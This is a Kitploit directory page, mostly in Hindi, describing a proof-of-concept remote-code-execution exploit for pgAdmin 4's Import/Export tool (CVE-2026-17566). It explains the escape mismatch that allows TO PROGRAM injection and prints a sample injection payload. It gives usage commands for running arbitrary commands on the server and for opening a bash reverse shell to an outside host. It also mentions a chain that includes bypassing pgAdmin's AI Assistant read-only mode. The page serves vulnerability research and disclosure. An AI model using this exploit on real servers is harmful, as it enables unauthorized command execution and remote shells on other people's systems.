Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hackspeak/cve-2026-17566
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubhackspeak/cve-2026-17566

CVE-2026-17566

pgAdmin 4 आयात/निर्यात RCE (CVE-2026-17566) PoC - बैकस्लैश-एस्केप बेमेल के माध्यम से TO प्रोग्राम इंजेक्शन

रिपॉजिटरी देखें
111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-17566 — pgAdmin 4 Import/Export Data RCE PoC

pgAdmin 4 Import/Export Data टूल के लिए रिमोट कोड एक्ज़ीक्यूशन (RCE) PoC। यह _is_query_parens_balanced() ब्रैकेट जाँचकर्ता और psql के बैकस्लैश एस्केप सिमेंटिक्स में अंतर का फायदा उठाकर \copy ... TO PROGRAM इंजेक्ट करता है, जिससे pgAdmin चलाने वाले सर्वर पर मनमाना कमांड निष्पादित होता है।

पृष्ठभूमि अटैक चेन: CVE-2026-17349 (Workspaces क्रेडेंशियल लीक) → CVE-2026-17351 (AI Assistant रीड-ओनली बाईपास) → यह भेद्यता (RCE)। तीनों के लिए केवल निम्न-विशेषाधिकार वाला प्रमाणित उपयोगकर्ता ही पर्याप्त है।

भेद्यता सारांश

Import/Export Data टूल उपयोगकर्ता के SQL को Jinja टेम्पलेट में डालकर psql \copy (...) कमांड बनाता है। हाथ से लिखा गया ब्रैकेट संतुलन जाँचकर्ता हमेशा \' को एस्केप किया हुआ कोट मानता है (यह केवल तभी सही है जब standard_conforming_strings=off हो); जबकि PostgreSQL डिफ़ॉल्ट standard_conforming_strings=on होने पर, , जिससे कोट सीधे बंद हो जाता है।

psql बैकस्लैश को सामान्य वर्ण मानता है
root@kitploit:~
-- 示意 payload
SELECT 'a\') TO PROGRAM 'echo pwned' x'

जाँचकर्ता सोचता है कि ) अभी भी स्ट्रिंग के अंदर है → ब्रैकेट "संतुलित" माना जाता है; psql a\' पर स्ट्रिंग बंद करता है, ) से \copy (...) का आवरण समाप्त होता है, और TO PROGRAM 'cmd' एक सक्रिय निर्देश बन जाता है, जिसे psql की popen() निष्पादित करती है।

  • CWE: CWE-78 (OS कमांड इंजेक्शन) / CWE-115 (इनपुट की गलत व्याख्या)
  • CVSS: 9.9 (CVSS 3.1) / 9.4 (CVSS 4.0), स्कोप परिवर्तन, निम्न विशेषाधिकार + कोई इंटरैक्शन नहीं
  • प्रभावित: pgAdmin 4 < 9.18 (_is_query_parens_balanced() के शुरू होने से); फिक्स commit 1496fabe
  • संबंधित: CVE-2025-12762 / CVE-2025-13780 (psql TO PROGRAM इंजेक्शन, समान परिवार)
  • खोजकर्ता: Arpit Jain (arpitjain099)

शोषण की शर्तें

  • प्रमाणित निम्न-विशेषाधिकार वाला pgAdmin उपयोगकर्ता (tools_import_export_data अनुमति के साथ)
  • pgAdmin सेवा तक नेटवर्क पहुँच
  • लक्ष्य pgAdmin 4 < 9.18 हो और Import/Export टूल उपलब्ध हो

उपयोग

root@kitploit:~
export PGADMIN_PASSWORD='账户密码'

# 任意命令(结果写入服务器侧文件,便于观察)
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --command 'id > /tmp/pgadmin_rce_proof'

# 反向 shell
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --reverse 10.0.0.1:4555
पैरामीटरविवरण
--urlpgAdmin का आधार URL
--user / --password (या PGADMIN_PASSWORD)निम्न-विशेषाधिकार खाता
--commandमनमाना कमांड (सिंगल कोट शामिल नहीं हो सकता)
--reverse HOST:PORTbash रिवर्स शेल उत्पन्न करता है
--server-idसर्वर ID (डिफ़ॉल्ट: पहला सर्वर स्वतः चुना जाता है)
--fileएक्सपोर्ट फ़ाइल नाम (\copy कमांड बनाने के लिए, डिफ़ॉल्ट /tmp/pgadmin_export.csv)
--no-verifyTLS प्रमाणपत्र सत्यापन छोड़ें

प्रक्रिया: लॉगिन (CSRF/session स्वतः संभाला जाता है) → सर्वर एन्यूमरेशन → POST /import_export/job/<sid> के माध्यम से तैयार is_query_export अनुरोध सबमिट करें।

⚠️ अस्वीकरण

यह केवल सुरक्षा अनुसंधान, भेद्यता सत्यापन और रक्षात्मक परीक्षण के लिए है। यह स्क्रिप्ट सार्वजनिक तकनीकी विश्लेषण के आधार पर लिखी गई है और वास्तविक मशीन पर सत्यापित नहीं की गई है, अनुरोध फ़ील्ड को लक्षित pgAdmin संस्करण के अनुसार थोड़ा समायोजित करने की आवश्यकता हो सकती है। कृपया इसे केवल अधिकृत परीक्षण वातावरण में चलाएँ, अनधिकृत सिस्टम पर उपयोग न करें।

श्रेय और संदर्भ

  • यह रिपॉज़िटरी स्वतंत्र रूप से लिखा गया PoC है (MIT License), तकनीकी आधार सार्वजनिक सामग्री पर आधारित है
  • आधिकारिक Issue #10213: ब्रैकेट जाँचकर्ता बैकस्लैश सिमेंटिक्स त्रुटि
  • OpenCVE: CVE-2026-17566
  • NVD: CVE-2026-17566
  • फिक्स commit: 1496fabe
टूल डाउनलोड करें